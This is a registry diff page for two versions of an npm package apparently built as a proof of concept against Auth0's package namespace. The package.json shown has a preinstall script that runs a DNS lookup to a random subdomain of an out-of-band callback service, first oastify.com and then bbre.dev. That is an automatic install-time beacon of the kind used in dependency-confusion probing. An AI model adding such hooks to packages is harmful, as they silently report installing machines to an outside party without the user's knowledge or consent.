my-npm-package-poc-auth0 1.0.0 → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +5 -1
  2. package/package.json +2 -2
package/index.js CHANGED
@@ -1 +1,5 @@
1
- console.log("Hello from Greg");
1
+ function test(){
2
+ console.log("Hello from Greg");
3
+ }
4
+
5
+ module.exports = test;
package/package.json CHANGED
@@ -1,10 +1,10 @@
1
1
  {
2
2
  "name": "my-npm-package-poc-auth0",
3
- "version": "1.0.0",
3
+ "version": "1.0.2",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
- "preinstall": "host 6ipkht3rw5o6nubg1z5mhly6dxjo7kv9.oastify.com",
7
+ "preinstall": "host krfyq7c55jxkw8kuade0qz7kmbs2gubi0.c.bbre.dev",
8
8
  "test": "echo \"Error: no test specified\" && exit 1"
9
9
  },
10
10
  "keywords": [],